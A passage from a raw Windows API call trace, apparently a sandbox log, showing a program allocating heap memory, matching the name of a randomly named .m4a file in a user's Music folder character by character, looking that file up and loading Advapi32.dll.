lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.072] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0253.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0253.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T3QpSK22qbSdU8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3QpSK22qbSdU8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QpSK22qbSdU8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pSK22qbSdU8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SK22qbSdU8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K22qbSdU8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="22qbSdU8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2qbSdU8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qbSdU8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bSdU8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SdU8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dU8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YAX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AX.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.074] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0253.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0253.074] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0253.074] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0253.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0253.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9e8 [0253.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0253.075] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0253.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0253.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0253.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0253.075] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0253.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0253.075] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0253.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0253.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0253.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0253.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0253.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.076] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\T3QpSK22qbSdU8p8YAX.m4a", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64b0faa0, ftCreationTime.dwHighDateTime=0x1d4ca0e, ftLastAccessTime.dwLowDateTime=0x95764540, ftLastAccessTime.dwHighDateTime=0x1d4cf4b, ftLastWriteTime.dwLowDateTime=0x95764540, ftLastWriteTime.dwHighDateTime=0x1d4cf4b, nFileSizeHigh=0x0, nFileSizeLow=0xe8b1, dwReserved0=0x4a0530, dwReserved1=0xe060, cFileName="T3QpSK22qbSdU8p8YAX.m4a", cAlternateFileName="T3QPSK~1.M4A")) returned 0xaa5920 [0253.077] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0253.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0253.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0253.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0253.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.078] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0253.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0253.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0253.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0253.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0253.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0253.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0253.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0253.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.080] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.080] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0253.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0253.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0253.081] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0253.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.081] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0253.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0253.082] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0253.082] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0253.082] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa460 [0253.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0253.082] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0253.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.083] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0253.083] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0253.083] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0253.085] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0253.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0253.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0253.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0253.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.086] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0253.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 